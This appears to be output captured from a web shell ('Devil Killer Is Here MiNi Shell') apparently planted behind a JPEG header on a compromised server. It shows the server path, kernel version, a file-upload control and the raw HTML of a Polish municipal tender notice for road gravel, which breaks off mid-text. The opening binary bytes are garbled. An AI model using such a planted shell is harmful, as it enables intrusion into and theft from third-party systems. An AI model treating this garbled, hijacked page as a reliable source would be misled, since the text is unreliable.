JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220407/0011451701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa kruszywa na drogi gminne </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wielgie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866583</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Starowiejska, 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wielgie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-603</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0542897380</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">0542897795</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@wielgie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wielgie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa kruszywa na drogi gminne </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3ab9a90f-b669-11ec-97c7-b646b0ba23df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00114517</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040321/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa kruszywa na drogi gminne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie o udzielenie<br/>zamówienia prowadzi się w języku polskim.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami<br/>odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy zakupowej<br/>dostępnej pod adresem: https://platformazakupowa.pl/.<br/>3. Składanie dokumentów, oświadczeń, wniosków, zawiadomień, zapytań oraz innych informacji z<br/>wyjątkiem oferty, odbywa się elektronicznie za pośrednictwem formularza ,,Wyślij wiadomość”<br/>dostępnego na stronie dotyczącej danego postępowania.<br/>4.Za datę złożenia dokumentów o których mowa w ust. 3, przyjmuje się kliknięcie przycisku ”Wyślij<br/>wiadomość” po którym pojawi się komunikat że wiadomość została wysłana do Zamawiającego.<br/>5. Oferty wraz z wymaganymi dokumentami, składa się elektronicznie za pośrednictwem Formularza<br/>składania oferty dostępnego na stronie dotyczącej danego postępowania.<br/>6.Szyfrowanie ofert odbywa się automatycznie przez system.<br/>Pozostałe zapisy w SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczna i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych za pośrednictwem<br/>platformy zakupowej o której mowa w ust. 2, opisane zostały w Regulaminie Internetowej Platformy<br/>Zakupowej oraz Instrukcji składania ofert, dostępnych na stronie dotyczącej danego postępowania oraz<br/>stronie głównej Platformy pod adresem www.platformazakupowa.pl. Wykonawca uczestniczący w<br/>przedmiotowym postępowaniu powinien zapoznać się z regulaminem korzystania z platformy i<br/>wszelkimi instrukcjami, które znajdują się na platformie14. Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty do ilości 10<br/>plików<br/>lub spakowanych folderów przy maksymalnej wielkości 150 MB.<br/>15. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 27 czerwca 2017 r. w sprawie użycia środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i przechowywania dokumentów<br/>elektronicznych oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy (Dz. U. z 2020 r., poz. 2415).<br/>16. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: a) w sprawach<br/>proceduralnych: p. Krzysztof Głowiński; e-mail: kglowinski@wielgie.pl b) w sprawach opisu przedmiotu<br/>zamówienia p. Sławomir Sadowski; e-mail: ssadowski@wielgie.pl.<br/>17. Nie będą udzielane wyjaśnienia na zapytania dotyczące niniejszej SWZ kierowane w formie ustnej<br/>bezpośredniej lub telefonicznie.<br/>18. Zamawiający nie przewiduje zwołania zebrania wszystkich Wykonawców, w celu wyjaśnienia<br/>wątpliwości dotyczących SWZ.<br/>19.Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego: a) Dokumenty w<br/>formacie PDF zaleca się podpisywać formatem PadES;<br/>b) Dokumenty w innym formacie niż PDF zaleca się podpisywać formatem XadES.<br/>20. Informacja w zakresie kodowania i oznaczania czasu przekazania danych: Pliki oferty załączone<br/>przez Wykonawcę na platformie, widoczne są jako zaszyfrowane. Możliwość otworzenia plików<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>Oznaczenie czasu przekazania przez platformę stanowi przypiętą do dokumentu elektronicznego lub<br/>wiadomości datę oraz dokładny czas (hh:mm:ss).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE – ogólne rozporządzenie o ochronie danych (RODO), informujemy, iż:<br/>Administratorem Twoich danych osobowych będzie: Wójt Gminy Wielgie. Możesz się z nim kontaktować w następujący sposób: listownie na adres siedziby: 87-603 Wielgie, ul Starowiejska 8, e-mailowo:<br/>gmina@wielgie.pl, telefonicznie: (54) 289 73 80.<br/>Do kontaktu w sprawie ochrony Twoich danych osobowych został także powołany inspektor ochrony<br/>danych, z którym możesz się kontaktować wysyłając e-mail na adres: iod@wielgie.pl.<br/>1. Twoje dane osobowe przetwarzane będą na podstawie:<br/>1) art. 6 ust. 1 lit c), art. 9 ust. 2 lit. g) i art. 10 RODO, w związku z ustawą z dnia<br/>29 stycznia 2004 r. Prawo zamówień publicznych i regulaminem udzielania zamówień<br/>publicznych w celu realizacji obowiązku prawnego ciążącego na administratorze tj. udzielenia<br/>zamówienia publicznego,<br/>2) art. 6 ust. 1 lit b) RODO, w związku z ustawą z dnia 29 stycznia 2004 r. Prawo zamówień<br/>publicznych i regulaminem udzielania zamówień publicznych w celu wykonania umowy, której stroną<br/>jest osoba, której dane dotyczą tj. zawarcie odpłatnej umowy zawieranej między zamawiającym a<br/>wykonawcą, której przedmiotem jest usługa, dostawa lub robota budowlana (też umowa o<br/>podwykonawstwo),<br/>3) art. 6 ust. 1 lit. a) na podstawie Twojej zgody. Zgoda jest wymagana, gdy uprawnienie do<br/>przetwarzania danych osobowych nie wynika wprost z przepisów prawa, np. podanie nr telefonu,<br/>adresu e-mail.<br/>2. Twoje dane osobowe możemy ujawniać, przekazywać i udostępniać wyłącznie podmiotom<br/>uprawnionym na podstawie obowiązujących przepisów prawa są nimi m.in. wykonawcy, podmioty<br/>świadczące usługi pocztowe, bankowe, telekomunikacyjne, organy ścigania, podatkowe, oraz inne<br/>podmioty, gdy wystąpią z takim żądaniem oczywiście w oparciu o stosowną podstawę prawną.<br/>Pracownikom oraz współpracownikom administratora.<br/>Twoje dane osobowe możemy także przekazywać podmiotom, które przetwarzają je na zlecenie<br/>administratora tzw. podmiotom przetwarzającym, są nimi m.in. podmioty świadczące usługi i towary<br/>finansowane z funduszu, z których będziesz mógł korzystać jako osoby uprawniona. Przekazanie<br/>Twoich danych jednakże nastąpić może tylko wtedy, gdy zapewnią one odpowiednią ochronę Twoich<br/>praw.<br/>3. Twoje dane osobowe przetwarzane będą do czasu istnienia podstawy do ich przetwarzania, w tym<br/>również przez okres przewidziany w przepisach dotyczących przechowywania i archiwizacji<br/>dokumentacji i tak:<br/>1) przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego,<br/>2) jeżeli czas trwania umowy przekracza 4 lata, przez czas trwania umowy, do czasu przedawnienia<br/>roszczeń,<br/>3) w zakresie danych, gdzie wyraziłeś zgodę na ich przetwarzanie, do czasu cofnięcie zgody, nie dłużej<br/>jednak niż do czasu wskazanego w pkt 1.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W związku z przetwarzaniem danych osobowych przez<br/>Administratora mają Państwo prawo do:<br/>1) dostępu do treści danych, jednakże jeżeli spełnienie obowiązku prawa dostępu do danych osobie<br/>której dane dotyczą, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od<br/>osoby, której dane dotyczą, wskazania dodatkowych informacji mających na<br/>celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu;<br/>2) sprostowania danych;<br/>3) usunięcia danych, jeżeli:<br/>a) wycofają zgodę na przetwarzanie danych osobowych;<br/>b) dane osobowe przestaną być niezbędne do celów, w których zostały zebrane lub<br/>w których były przetwarzane;<br/>c) dane są przetwarzane niezgodnie z prawem<br/>4) ograniczenia przetwarzania danych, jeżeli:<br/>a) osoba, której dane dotyczą, kwestionuje prawidłowość danych osobowych;<br/>b) przetwarzanie jest niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się usunięciu<br/>danych osobowych, żądając w zamian ograniczenia ich wykorzystywania;<br/>c) administrator nie potrzebuje już danych osobowych do celów przetwarzania, ale są one potrzebne<br/>osobie, której dane dotyczą, do ustalenia, dochodzenia lub obrony roszczeń;<br/>d) osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania – do czasu stwierdzenia, czy<br/>prawnie uzasadnione podstawy po stronie administratora są nadrzędne wobec podstaw sprzeciwu<br/>osoby, której dane dotyczą; wystąpienie osoby z żądaniem ograniczenia przetwarzania danych nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego lub konkursu.<br/>5) cofnięcia zgody w dowolnym momencie. Cofnięcie zgody nie wpływa na przetwarzanie danych<br/>dokonywane przez administratora przed jej cofnięciem.<br/>5. Podanie Twoich danych:<br/>1) jest wymogiem ustawy na podstawie, których działa administrator. Jeżeli odmówisz podania Twoich<br/>danych lub podasz nieprawidłowe dane, administrator nie będzie mógł zrealizować celu do jakiego<br/>zobowiązują go przepisy prawa,<br/>2) jest dobrowolne i odbywa się na podstawie Twojej zgody, która może być cofnięta w dowolnym<br/>momencie.<br/>6. Przysługuje Ci także skarga do organu do organu nadzorczego - Prezesa Urzędu Ochrony Danych<br/>Osobowych ul. Stawki 2 00-193 Warszawa, gdy uznasz, iż przetwarzanie Twoich danych osobowych<br/>narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r.<br/>7. Twoje dane nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie<br/>profilowania.<br/>8. Administrator nie przekazuje danych osobowych do państwa trzeciego lub organizacji<br/>międzynarodowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GSR.271.1.2022.KG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 143429,70 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje dostawę kruszywa - kamienia polnego łamanego lub kruszywa granitowego łamanego o frakcji 0-31,5 mm w ilości 1840 ton z tym zastrzeżeniem, że ilość ton może ulec zmianie w zależności od posiadanych środków. Wskazana ilość służy do ustalenia ceny jednostkowej. Zamawiający nie dopuszcza kruszywa z grupy kamień wapienny. Dostarczone kruszywo powinno posiadać wymagane przepisami prawa atesty, certyfikaty, świadectwa jakości. Powinno być czyste, bez domieszek materiałów niepożądanych (odpady metalowe, plastikowe, drewniane), gliny, piasku. Frakcje drobne muszą pochodzić wyłącznie z kruszenia materiału rodzimego (kamień polny, granit).<br/>Przedmiot zamówienia winien odpowiadać normie PN-EN-13242. Dostawa kruszywa następować będzie sukcesywnie od dnia podpisania umowy do dnia 31 lipca 2022r. w partiach dziennych od 50 do 350 ton, uzgodnionych w dniu poprzedzającym dzień dostawy z Zamawiającym telefonicznie lub drogą elektroniczną. Dostawa obejmuje: załadunek, ważenie, transport, przeprofilowanie równiarką drogi pod rozładowywany materiał, rozładunek i rozgarnięcie równiarką samobieżną w miejscach wskazanym przez Zamawiającego 250 ton kruszywa należy dostarczyć na plac Zamawiającego położony przy ul. Szkolnej.<br/>Dostawy należy realizować w dni powszednie od poniedziałku do piątku w godz. 7.30 do 15.30. Dostawy realizowane po wyznaczonych godzinach będą traktowane jako dostawy realizowane poza umową. Zamawiający zastrzega sobie prawo do kontrolnego ważenia dostarczanego kruszywa i kontroli jego jakości. W przypadku stwierdzenia niezgodności deklarowanej wagi z ważeniem kontrolnym lub potwierdzenia badaniem laboratoryjnym niewłaściwej jakości dostarczanego kruszywa, Wykonawca poniesie koszty takich sprawdzeń i badań. Zamawiający ma prawo wyboru laboratorium, w którym odbędzie się badanie kruszywa. Na każdy kurs dostarczanego kruszywa Wykonawca wystawi dowód dostawy, w którym określona będzie ilość kruszywa. Dokument powinien być potwierdzony przez pracownika Zamawiającego lub radnego, sołtysa danego sołectwa i przekazany do Urzędu Gminy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14212300-3 - Kamień pokruszony lub rozłupany</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najniższa cena brutto</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 10.1. aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w<br/>postępowaniu w zakresie wskazanym odpowiednio w Załączniku nr 2a do SWZ. Informacje<br/>zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca spełnia warunki<br/>udziału w postępowaniu.<br/>10.2. aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z<br/>postępowania w zakresie wskazanym odpowiednio w Załączniku nr 2b do SWZ. Informacje<br/>zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu.<br/>10.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o<br/>którym mowa w pkt 10.2. SWZ składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie.<br/>10.4. W przypadku, kiedy Wykonawca zamierza powierzyć wykonanie części zamówienia<br/>podwykonawcy, Zamawiający żąda wskazania przez wykonawcę w Formularzu oferty, części<br/>zamówienia, których wykonanie zamierza powierzyć podwykonawcom, i podania przez<br/>wykonawcę firm podwykonawców o ile są znane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - realizację w okresie ostatnich trzech lat (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) minimum 1 zamówienia polegających na dostawie kruszywa zgodnego z przedmiotem zamówienia w ilości minimum 1500 ton.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Oferta musi być zabezpieczona wadium w wysokości 4 000,00 zł (słownie: cztery tysiące zł 00/100);<br/>2.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>3.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>4. Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego: KDBS o/Wielgie nr rachunku: 33 9550 0003 